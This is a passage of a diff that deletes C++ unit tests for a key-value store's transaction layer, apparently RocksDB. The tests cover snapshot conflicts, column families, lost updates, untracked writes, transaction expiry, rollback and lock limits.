-    txn->GetForUpdate(snapshot_read_options, "foo", &value);
-    ASSERT_EQ(value, "bar");
-
-    s = txn->Put(Slice("foo"), Slice("bar2"));
-    ASSERT_OK(s);
-
-    txn->GetForUpdate(snapshot_read_options, "foo", &value);
-    ASSERT_EQ(value, "bar2");
-    // verify foo is locked by txn
-    s = db->Delete(write_options, "foo");
-    ASSERT_TRUE(s.IsTimedOut());
-
-    s = db->Put(write_options, "Z", "z");
-    ASSERT_OK(s);
-    s = db->Put(write_options, "dummy", "dummy");
-    ASSERT_OK(s);
-
-    s = db->Put(write_options, "S", "s");
-    ASSERT_OK(s);
-    s = db->SingleDelete(write_options, "S");
-    ASSERT_OK(s);
-
-    s = txn->Delete("S");
-    // Should fail after encountering a write to S in memtable
-    ASSERT_TRUE(s.IsBusy());
-
-    // force a memtable flush
-    s = db_impl->TEST_FlushMemTable(true);
-    ASSERT_OK(s);
-
-    // Put a random key so we have a MemTable to flush
-    s = db->Put(write_options, "dummy", "dummy2");
-    ASSERT_OK(s);
-
-    // force a memtable flush
-    ASSERT_OK(db_impl->TEST_FlushMemTable(true));
-
-    s = db->Put(write_options, "dummy", "dummy3");
-    ASSERT_OK(s);
-
-    // force a memtable flush
-    // Since our test db has max_write_buffer_number=2, this flush will cause
-    // the first memtable to get purged from the MemtableList history.
-    ASSERT_OK(db_impl->TEST_FlushMemTable(true));
-
-    s = txn->Put("X", "Y");
-    // Should succeed after verifying there is no write to X in SST file
-    ASSERT_OK(s);
-
-    s = txn->Put("Z", "zz");
-    // Should fail after encountering a write to Z in SST file
-    ASSERT_TRUE(s.IsBusy());
-
-    s = txn->GetForUpdate(read_options, "foo2", &value);
-    // should succeed since key was written before txn started
-    ASSERT_OK(s);
-    // verify foo2 is locked by txn
-    s = db->Delete(write_options, "foo2");
-    ASSERT_TRUE(s.IsTimedOut());
-
-    s = txn->Delete("S");
-    // Should fail after encountering a write to S in SST file
-    ASSERT_TRUE(s.IsBusy());
-
-    // Write a bunch of keys to db to force a compaction
-    Random rnd(47);
-    for (int i = 0; i < 1000; i++) {
-      s = db->Put(write_options, std::to_string(i),
-                  test::CompressibleString(&rnd, 0.8, 100, &value));
-      ASSERT_OK(s);
-    }
-
-    s = txn->Put("X", "yy");
-    // Should succeed after verifying there is no write to X in SST file
-    ASSERT_OK(s);
-
-    s = txn->Put("Z", "zzz");
-    // Should fail after encountering a write to Z in SST file
-    ASSERT_TRUE(s.IsBusy());
-
-    s = txn->Delete("S");
-    // Should fail after encountering a write to S in SST file
-    ASSERT_TRUE(s.IsBusy());
-
-    s = txn->GetForUpdate(read_options, "foo3", &value);
-    // should succeed since key was written before txn started
-    ASSERT_OK(s);
-    // verify foo3 is locked by txn
-    s = db->Delete(write_options, "foo3");
-    ASSERT_TRUE(s.IsTimedOut());
-
-    db_impl->TEST_WaitForCompact();
-
-    s = txn->Commit();
-    ASSERT_OK(s);
-
-    // Transaction should only write the keys that succeeded.
-    s = db->Get(read_options, "foo", &value);
-    ASSERT_EQ(value, "bar2");
-
-    s = db->Get(read_options, "X", &value);
-    ASSERT_OK(s);
-    ASSERT_EQ("yy", value);
-
-    s = db->Get(read_options, "Z", &value);
-    ASSERT_OK(s);
-    ASSERT_EQ("z", value);
-
-  delete txn;
-  }
-}
-
-TEST_P(TransactionTest, NoSnapshotTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "AAA", "bar");
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  // Modify key after transaction start
-  db->Put(write_options, "AAA", "bar1");
-
-  // Read and write without a snap
-  txn->GetForUpdate(read_options, "AAA", &value);
-  ASSERT_EQ(value, "bar1");
-  s = txn->Put("AAA", "bar2");
-  ASSERT_OK(s);
-
-  // Should commit since read/write was done after data changed
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  txn->GetForUpdate(read_options, "AAA", &value);
-  ASSERT_EQ(value, "bar2");
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, MultipleSnapshotTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "AAA", "bar");
-  db->Put(write_options, "BBB", "bar");
-  db->Put(write_options, "CCC", "bar");
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  db->Put(write_options, "AAA", "bar1");
-
-  // Read and write without a snapshot
-  txn->GetForUpdate(read_options, "AAA", &value);
-  ASSERT_EQ(value, "bar1");
-  s = txn->Put("AAA", "bar2");
-  ASSERT_OK(s);
-
-  // Modify BBB before snapshot is taken
-  db->Put(write_options, "BBB", "bar1");
-
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  // Read and write with snapshot
-  txn->GetForUpdate(snapshot_read_options, "BBB", &value);
-  ASSERT_EQ(value, "bar1");
-  s = txn->Put("BBB", "bar2");
-  ASSERT_OK(s);
-
-  db->Put(write_options, "CCC", "bar1");
-
-  // Set a new snapshot
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  // Read and write with snapshot
-  txn->GetForUpdate(snapshot_read_options, "CCC", &value);
-  ASSERT_EQ(value, "bar1");
-  s = txn->Put("CCC", "bar2");
-  ASSERT_OK(s);
-
-  s = txn->GetForUpdate(read_options, "AAA", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-  s = txn->GetForUpdate(read_options, "BBB", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-  s = txn->GetForUpdate(read_options, "CCC", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-
-  s = db->Get(read_options, "AAA", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar1");
-  s = db->Get(read_options, "BBB", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar1");
-  s = db->Get(read_options, "CCC", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar1");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "AAA", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-  s = db->Get(read_options, "BBB", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-  s = db->Get(read_options, "CCC", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-
-  // verify that we track multiple writes to the same key at different snapshots
-  delete txn;
-  txn = db->BeginTransaction(write_options);
-
-  // Potentially conflicting writes
-  db->Put(write_options, "ZZZ", "zzz");
-  db->Put(write_options, "XXX", "xxx");
-
-  txn->SetSnapshot();
-
-  TransactionOptions txn_options;
-  txn_options.set_snapshot = true;
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  txn2->SetSnapshot();
-
-  // This should not conflict in txn since the snapshot is later than the
-  // previous write (spoiler alert:  it will later conflict with txn2).
-  s = txn->Put("ZZZ", "zzzz");
-  ASSERT_OK(s);
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete txn;
-
-  // This will conflict since the snapshot is earlier than another write to ZZZ
-  s = txn2->Put("ZZZ", "xxxxx");
-  ASSERT_TRUE(s.IsBusy());
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "ZZZ", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "zzzz");
-
-  delete txn2;
-}
-
-TEST_P(TransactionTest, ColumnFamiliesTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  ColumnFamilyHandle *cfa, *cfb;
-  ColumnFamilyOptions cf_options;
-
-  // Create 2 new column families
-  s = db->CreateColumnFamily(cf_options, "CFA", &cfa);
-  ASSERT_OK(s);
-  s = db->CreateColumnFamily(cf_options, "CFB", &cfb);
-  ASSERT_OK(s);
-
-  delete cfa;
-  delete cfb;
-  delete db;
-  db = nullptr;
-
-  // open DB with three column families
-  std::vector<ColumnFamilyDescriptor> column_families;
-  // have to open default column family
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, ColumnFamilyOptions()));
-  // open the new column families
-  column_families.push_back(
-      ColumnFamilyDescriptor("CFA", ColumnFamilyOptions()));
-  column_families.push_back(
-      ColumnFamilyDescriptor("CFB", ColumnFamilyOptions()));
-
-  std::vector<ColumnFamilyHandle*> handles;
-
-  s = TransactionDB::Open(options, txn_db_options, dbname, column_families,
-                          &handles, &db);
-  assert(db != nullptr);
-  ASSERT_OK(s);
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn_options.set_snapshot = true;
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn2);
-
-  // Write some data to the db
-  WriteBatch batch;
-  batch.Put("foo", "foo");
-  batch.Put(handles[1], "AAA", "bar");
-  batch.Put(handles[1], "AAAZZZ", "bar");
-  s = db->Write(write_options, &batch);
-  ASSERT_OK(s);
-  db->Delete(write_options, handles[1], "AAAZZZ");
-
-  // These keys do not conflict with existing writes since they're in
-  // different column families
-  s = txn->Delete("AAA");
-  ASSERT_OK(s);
-  s = txn->GetForUpdate(snapshot_read_options, handles[1], "foo", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  Slice key_slice("AAAZZZ");
-  Slice value_slices[2] = {Slice("bar"), Slice("bar")};
-  s = txn->Put(handles[2], SliceParts(&key_slice, 1),
-               SliceParts(value_slices, 2));
-  ASSERT_OK(s);
-  ASSERT_EQ(3, txn->GetNumKeys());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-  s = db->Get(read_options, "AAA", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = db->Get(read_options, handles[2], "AAAZZZ", &value);
-  ASSERT_EQ(value, "barbar");
-
-  Slice key_slices[3] = {Slice("AAA"), Slice("ZZ"), Slice("Z")};
-  Slice value_slice("barbarbar");
-
-  s = txn2->Delete(handles[2], "XXX");
-  ASSERT_OK(s);
-  s = txn2->Delete(handles[1], "XXX");
-  ASSERT_OK(s);
-
-  // This write will cause a conflict with the earlier batch write
-  s = txn2->Put(handles[1], SliceParts(key_slices, 3),
-                SliceParts(&value_slice, 1));
-  ASSERT_TRUE(s.IsBusy());
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  // In the above the latest change to AAAZZZ in handles[1] is delete.
-  s = db->Get(read_options, handles[1], "AAAZZZ", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-  delete txn2;
-
-  txn = db->BeginTransaction(write_options, txn_options);
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn2 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn);
-
-  std::vector<ColumnFamilyHandle*> multiget_cfh = {handles[1], handles[2],
-                                                   handles[0], handles[2]};
-  std::vector<Slice> multiget_keys = {"AAA", "AAAZZZ", "foo", "foo"};
-  std::vector<std::string> values(4);
-
-  std::vector<Status> results = txn->MultiGetForUpdate(
-      snapshot_read_options, multiget_cfh, multiget_keys, &values);
-  ASSERT_OK(results[0]);
-  ASSERT_OK(results[1]);
-  ASSERT_OK(results[2]);
-  ASSERT_TRUE(results[3].IsNotFound());
-  ASSERT_EQ(values[0], "bar");
-  ASSERT_EQ(values[1], "barbar");
-  ASSERT_EQ(values[2], "foo");
-
-  s = txn->SingleDelete(handles[2], "ZZZ");
-  ASSERT_OK(s);
-  s = txn->Put(handles[2], "ZZZ", "YYY");
-  ASSERT_OK(s);
-  s = txn->Put(handles[2], "ZZZ", "YYYY");
-  ASSERT_OK(s);
-  s = txn->Delete(handles[2], "ZZZ");
-  ASSERT_OK(s);
-  s = txn->Put(handles[2], "AAAZZZ", "barbarbar");
-  ASSERT_OK(s);
-
-  ASSERT_EQ(5, txn->GetNumKeys());
-
-  // Txn should commit
-  s = txn->Commit();
-  ASSERT_OK(s);
-  s = db->Get(read_options, handles[2], "ZZZ", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  // Put a key which will conflict with the next txn using the previous snapshot
-  db->Put(write_options, handles[2], "foo", "000");
-
-  results = txn2->MultiGetForUpdate(snapshot_read_options, multiget_cfh,
-                                    multiget_keys, &values);
-  // All results should fail since there was a conflict
-  ASSERT_TRUE(results[0].IsBusy());
-  ASSERT_TRUE(results[1].IsBusy());
-  ASSERT_TRUE(results[2].IsBusy());
-  ASSERT_TRUE(results[3].IsBusy());
-
-  s = db->Get(read_options, handles[2], "foo", &value);
-  ASSERT_EQ(value, "000");
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->DropColumnFamily(handles[1]);
-  ASSERT_OK(s);
-  s = db->DropColumnFamily(handles[2]);
-  ASSERT_OK(s);
-
-  delete txn;
-  delete txn2;
-
-  for (auto handle : handles) {
-    delete handle;
-  }
-}
-
-TEST_P(TransactionTest, ColumnFamiliesTest2) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  ColumnFamilyHandle *one, *two;
-  ColumnFamilyOptions cf_options;
-
-  // Create 2 new column families
-  s = db->CreateColumnFamily(cf_options, "ONE", &one);
-  ASSERT_OK(s);
-  s = db->CreateColumnFamily(cf_options, "TWO", &two);
-  ASSERT_OK(s);
-
-  Transaction* txn1 = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn1);
-  Transaction* txn2 = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn2);
-
-  s = txn1->Put(one, "X", "1");
-  ASSERT_OK(s);
-  s = txn1->Put(two, "X", "2");
-  ASSERT_OK(s);
-  s = txn1->Put("X", "0");
-  ASSERT_OK(s);
-
-  s = txn2->Put(one, "X", "11");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  // Drop first column family
-  s = db->DropColumnFamily(one);
-  ASSERT_OK(s);
-
-  // Should fail since column family was dropped.
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-  txn1 = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn1);
-
-  // Should fail since column family was dropped
-  s = txn1->Put(one, "X", "111");
-  ASSERT_TRUE(s.IsInvalidArgument());
-
-  s = txn1->Put(two, "X", "222");
-  ASSERT_OK(s);
-
-  s = txn1->Put("X", "000");
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, two, "X", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("222", value);
-
-  s = db->Get(read_options, "X", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("000", value);
-
-  s = db->DropColumnFamily(two);
-  ASSERT_OK(s);
-
-  delete txn1;
-  delete txn2;
-
-  delete one;
-  delete two;
-}
-
-TEST_P(TransactionTest, EmptyTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  s = db->Put(write_options, "aaa", "aaa");
-  ASSERT_OK(s);
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  txn = db->BeginTransaction(write_options);
-  txn->Rollback();
-  delete txn;
-
-  txn = db->BeginTransaction(write_options);
-  s = txn->GetForUpdate(read_options, "aaa", &value);
-  ASSERT_EQ(value, "aaa");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  txn = db->BeginTransaction(write_options);
-  txn->SetSnapshot();
-
-  s = txn->GetForUpdate(read_options, "aaa", &value);
-  ASSERT_EQ(value, "aaa");
-
-  // Conflicts with previous GetForUpdate
-  s = db->Put(write_options, "aaa", "xxx");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  // transaction expired!
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-}
-
-TEST_P(TransactionTest, PredicateManyPreceders) {
-  WriteOptions write_options;
-  ReadOptions read_options1, read_options2;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  txn_options.set_snapshot = true;
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  Transaction* txn2 = db->BeginTransaction(write_options);
-  txn2->SetSnapshot();
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  std::vector<Slice> multiget_keys = {"1", "2", "3"};
-  std::vector<std::string> multiget_values;
-
-  std::vector<Status> results =
-      txn1->MultiGetForUpdate(read_options1, multiget_keys, &multiget_values);
-  ASSERT_TRUE(results[1].IsNotFound());
-
-  s = txn2->Put("2", "x");  // Conflict's with txn1's MultiGetForUpdate
-  ASSERT_TRUE(s.IsTimedOut());
-
-  txn2->Rollback();
-
-  multiget_values.clear();
-  results =
-      txn1->MultiGetForUpdate(read_options1, multiget_keys, &multiget_values);
-  ASSERT_TRUE(results[1].IsNotFound());
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-  delete txn2;
-
-  txn1 = db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  txn2 = db->BeginTransaction(write_options, txn_options);
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  s = txn1->Put("4", "x");
-  ASSERT_OK(s);
-
-  s = txn2->Delete("4");  // conflict
-  ASSERT_TRUE(s.IsTimedOut());
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options2, "4", &value);
-  ASSERT_TRUE(s.IsBusy());
-
-  txn2->Rollback();
-
-  delete txn1;
-  delete txn2;
-}
-
-TEST_P(TransactionTest, LostUpdate) {
-  WriteOptions write_options;
-  ReadOptions read_options, read_options1, read_options2;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  // Test 2 transactions writing to the same key in multiple orders and
-  // with/without snapshots
-
-  Transaction* txn1 = db->BeginTransaction(write_options);
-  Transaction* txn2 = db->BeginTransaction(write_options);
-
-  s = txn1->Put("1", "1");
-  ASSERT_OK(s);
-
-  s = txn2->Put("1", "2");  // conflict
-  ASSERT_TRUE(s.IsTimedOut());
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "1", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("1", value);
-
-  delete txn1;
-  delete txn2;
-
-  txn_options.set_snapshot = true;
-  txn1 = db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  txn2 = db->BeginTransaction(write_options, txn_options);
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  s = txn1->Put("1", "3");
-  ASSERT_OK(s);
-  s = txn2->Put("1", "4");  // conflict
-  ASSERT_TRUE(s.IsTimedOut());
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "1", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("3", value);
-
-  delete txn1;
-  delete txn2;
-
-  txn1 = db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  txn2 = db->BeginTransaction(write_options, txn_options);
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  s = txn1->Put("1", "5");
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->Put("1", "6");
-  ASSERT_TRUE(s.IsBusy());
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "1", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("5", value);
-
-  delete txn1;
-  delete txn2;
-
-  txn1 = db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  txn2 = db->BeginTransaction(write_options, txn_options);
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  s = txn1->Put("1", "7");
-  ASSERT_OK(s);
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  txn2->SetSnapshot();
-  s = txn2->Put("1", "8");
-  ASSERT_OK(s);
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "1", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("8", value);
-
-  delete txn1;
-  delete txn2;
-
-  txn1 = db->BeginTransaction(write_options);
-  txn2 = db->BeginTransaction(write_options);
-
-  s = txn1->Put("1", "9");
-  ASSERT_OK(s);
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->Put("1", "10");
-  ASSERT_OK(s);
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-  delete txn2;
-
-  s = db->Get(read_options, "1", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "10");
-}
-
-TEST_P(TransactionTest, UntrackedWrites) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  // Verify transaction rollback works for untracked keys.
-  Transaction* txn = db->BeginTransaction(write_options);
-  txn->SetSnapshot();
-
-  s = txn->PutUntracked("untracked", "0");
-  ASSERT_OK(s);
-  txn->Rollback();
-  s = db->Get(read_options, "untracked", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-  txn = db->BeginTransaction(write_options);
-  txn->SetSnapshot();
-
-  s = db->Put(write_options, "untracked", "x");
-  ASSERT_OK(s);
-
-  // Untracked writes should succeed even though key was written after snapshot
-  s = txn->PutUntracked("untracked", "1");
-  ASSERT_OK(s);
-  s = txn->MergeUntracked("untracked", "2");
-  ASSERT_OK(s);
-  s = txn->DeleteUntracked("untracked");
-  ASSERT_OK(s);
-
-  // Conflict
-  s = txn->Put("untracked", "3");
-  ASSERT_TRUE(s.IsBusy());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "untracked", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, ExpiredTransaction) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  // Set txn expiration timeout to 0 microseconds (expires instantly)
-  txn_options.expiration = 0;
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-
-  s = txn1->Put("X", "1");
-  ASSERT_OK(s);
-
-  s = txn1->Put("Y", "1");
-  ASSERT_OK(s);
-
-  Transaction* txn2 = db->BeginTransaction(write_options);
-
-  // txn2 should be able to write to X since txn1 has expired
-  s = txn2->Put("X", "2");
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  s = db->Get(read_options, "X", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("2", value);
-
-  s = txn1->Put("Z", "1");
-  ASSERT_OK(s);
-
-  // txn1 should fail to commit since it is expired
-  s = txn1->Commit();
-  ASSERT_TRUE(s.IsExpired());
-
-  s = db->Get(read_options, "Y", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Get(read_options, "Z", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn1;
-  delete txn2;
-}
-
-TEST_P(TransactionTest, ReinitializeTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  // Set txn expiration timeout to 0 microseconds (expires instantly)
-  txn_options.expiration = 0;
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-
-  // Reinitialize transaction to no long expire
-  txn_options.expiration = -1;
-  txn1 = db->BeginTransaction(write_options, txn_options, txn1);
-
-  s = txn1->Put("Z", "z");
-  ASSERT_OK(s);
-
-  // Should commit since not expired
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  txn1 = db->BeginTransaction(write_options, txn_options, txn1);
-
-  s = txn1->Put("Z", "zz");
-  ASSERT_OK(s);
-
-  // Reinitilize txn1 and verify that Z gets unlocked
-  txn1 = db->BeginTransaction(write_options, txn_options, txn1);
-
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options, nullptr);
-  s = txn2->Put("Z", "zzz");
-  ASSERT_OK(s);
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  s = db->Get(read_options, "Z", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "zzz");
-
-  // Verify snapshots get reinitialized correctly
-  txn1->SetSnapshot();
-  s = txn1->Put("Z", "zzzz");
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "Z", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "zzzz");
-
-  txn1 = db->BeginTransaction(write_options, txn_options, txn1);
-  const Snapshot* snapshot = txn1->GetSnapshot();
-  ASSERT_FALSE(snapshot);
-
-  txn_options.set_snapshot = true;
-  txn1 = db->BeginTransaction(write_options, txn_options, txn1);
-  snapshot = txn1->GetSnapshot();
-  ASSERT_TRUE(snapshot);
-
-  s = txn1->Put("Z", "a");
-  ASSERT_OK(s);
-
-  txn1->Rollback();
-
-  s = txn1->Put("Y", "y");
-  ASSERT_OK(s);
-
-  txn_options.set_snapshot = false;
-  txn1 = db->BeginTransaction(write_options, txn_options, txn1);
-  snapshot = txn1->GetSnapshot();
-  ASSERT_FALSE(snapshot);
-
-  s = txn1->Put("X", "x");
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "Z", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "zzzz");
-
-  s = db->Get(read_options, "Y", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  txn1 = db->BeginTransaction(write_options, txn_options, txn1);
-
-  s = txn1->SetName("name");
-  ASSERT_OK(s);
-
-  s = txn1->Prepare();
-  ASSERT_OK(s);
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  txn1 = db->BeginTransaction(write_options, txn_options, txn1);
-
-  s = txn1->SetName("name");
-  ASSERT_OK(s);
-
-  delete txn1;
-}
-
-TEST_P(TransactionTest, Rollback) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-
-  ASSERT_OK(s);
-
-  s = txn1->Put("X", "1");
-  ASSERT_OK(s);
-
-  Transaction* txn2 = db->BeginTransaction(write_options);
-
-  // txn2 should not be able to write to X since txn1 has it locked
-  s = txn2->Put("X", "2");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  txn1->Rollback();
-  delete txn1;
-
-  // txn2 should now be able to write to X
-  s = txn2->Put("X", "3");
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "X", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("3", value);
-
-  delete txn2;
-}
-
-TEST_P(TransactionTest, LockLimitTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  delete db;
-  db = nullptr;
-
-  // Open DB with a lock limit of 3
-  txn_db_options.max_num_locks = 3;
-  s = TransactionDB::Open(options, txn_db_options, dbname, &db);
-  assert(db != nullptr);
-  ASSERT_OK(s);
-
-  // Create a txn and verify we can only lock up to 3 keys
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = txn->Put("X", "x");
-  ASSERT_OK(s);
-
-  s = txn->Put("Y", "y");
-  ASSERT_OK(s);
-
-  s = txn->Put("Z", "z");
-  ASSERT_OK(s);
-
-  // lock limit reached
-  s = txn->Put("W", "w");
-  ASSERT_TRUE(s.IsBusy());
-
-  // re-locking same key shouldn't put us over the limit
-  s = txn->Put("X", "xx");
-  ASSERT_OK(s);
-
-  s = txn->GetForUpdate(read_options, "W", &value);
-  ASSERT_TRUE(s.IsBusy());
-  s = txn->GetForUpdate(read_options, "V", &value);
-  ASSERT_TRUE(s.IsBusy());
-
-  // re-locking same key shouldn't put us over the limit
-  s = txn->GetForUpdate(read_options, "Y", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("y", value);
-
-  s = txn->Get(read_options, "W", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  Transaction* txn2 = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn2);
-
-  // "X" currently locked
-  s = txn2->Put("X", "x");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  // lock limit reached
-  s = txn2->Put("M", "m");
-  ASSERT_TRUE(s.IsBusy());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "X", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("xx", value);
-
-  s = db->Get(read_options, "W", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  // Committing txn should release its locks and allow txn2 to proceed
-  s = txn2->Put("X", "x2");
-  ASSERT_OK(s);
-
-  s = txn2->Delete("X");
-  ASSERT_OK(s);
-
-  s = txn2->Put("M", "m");
-  ASSERT_OK(s);
-
-  s = txn2->Put("Z", "z2");
-  ASSERT_OK(s);
-
-  // lock limit reached
-  s = txn2->Delete("Y");
-  ASSERT_TRUE(s.IsBusy());
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "Z", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("z2", value);
-
-  s = db->Get(read_options, "Y", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("y", value);
-
-  s = db->Get(read_options, "X", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-  delete txn2;
-}
-
